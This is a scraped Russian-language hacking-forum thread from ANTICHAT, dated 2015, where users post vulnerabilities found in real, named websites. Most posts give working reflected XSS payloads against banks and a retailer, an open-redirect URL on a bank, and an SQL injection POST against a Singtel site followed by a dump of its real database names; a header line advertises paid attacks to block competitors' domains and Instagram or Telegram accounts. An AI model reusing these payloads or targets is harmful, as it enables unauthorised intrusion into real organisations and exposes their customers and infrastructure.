УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Уязвимости SQLi, XSS и другие.

Страница 17 из 35

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#161

29.08.2015, 12:02

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
Target:http://www.ecco-shoes.ru/search

Type:XSS-Reflected

Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .

Код:

Code:
">alert('Hello') .

а также

Код:

Code: www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --&region=Архангельская+область&town=Архангельск

Да и вообще на этом сайте много XSS .

последнее это что?

#162

29.08.2015, 14:24

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
29

Репутация: 0

Это похоже просто на копипаст откудато.

Кстати этот сайт бомбили еще в 2008 году https://older.antichat.net/showpost....&postcount=273

#163

29.08.2015, 15:13

joelblack

Guest

Сообщений: n/a

Провел на форуме:
70303

Репутация: 145

target: http://www.kred-bank.ru

type: XSS Reflected

Строка поиска:

Код:

Code: ">alert('Hello')

#164

29.08.2015, 16:50

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

target : http://6dosug777.com/en/spb/forum/o...u-po-karmanu-raznyie-tsenovyie-kategor.9.html

Type:XSS-Reflected

Код:

Code: 'alert('SIXSS')

Там в самом внизу комментарии можно оставлять без всяких заполнений .

Сорри,я там нафлудил чуток) .

Скрипт можете вставить свой,я чисто для примера другой написал .

#165

29.08.2015, 17:07

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

Цитата:

Сообщение от ocheretko

ocheretko said:
↑
Это похоже просто на копипаст откудато.
Кстати этот сайт бомбили еще в 2008 году
https://older.antichat.net/showpost....&postcount=273

Ну может скопипастил,но не специально,т.к я просто рыскал по гуглу .

А последнее это та же XSS,но на крайняк может понадобиться .

#166

29.08.2015, 17:30

joelblack

Guest

Сообщений: n/a

Провел на форуме:
70303

Репутация: 145

target: http://sobinbank.ru/

type: Open Redirect

Код:

Code: http://sobinbank.ru/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=http://ya.ru

target: http://sinko-bank.ru

type: XSS Reflected

Строка поиска:

Код:

Code: ">alert('Hello')

#167

29.08.2015, 18:13

DDShadoww

Guest

Сообщений: n/a

Провел на форуме:
2236

Репутация: 2

target:http://halykbank.kz

type: XSS-Reflected

Код HTML:

HTML: http://halykbank.kz/ru/search?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

#168

30.08.2015, 11:30

w0rm_

Guest

Сообщений: n/a

Провел на форуме:
4367

Репутация: 8

Target:home.singtel.com

Type: SQL injection

Код:

Code:
http://home.singtel.com/include/tell_a_friend_process.asp 

POST:
segment_id_=awdpojawdpj&url_=awdz&page_title_=awd&email_sent_=xapt0x@xapk.ru' and 1=(select top 1 table_name from information_schema.tables)--&email_from_=aaw221&remark_=awdawd22&x=9&y=5 

singtelsgp 
singtelsgp-stag 
miotv-stag 
singtelmiotvstaffplan 
miotv-prd 
STSGP09-stag 
STSGP09 
ClickCounter 
STMIO-STAG 
STMIO 
uefa-phase1 
uefa-prod 
uefa-stag 
STSGP2011-stag-KIV 
STSGP2011-KIV 
race2011-stag 
race2011-prod 
singtelcorp2010new 
yog 
YOGWEBCAST 
STCON 
STBIZ 
singtel_3 
singtel_3_Monday1 
eids_sso 
accelerate 
browdb 
faceapp-stag 
faceapp-prod 
distis_agent 
miotv400k_prd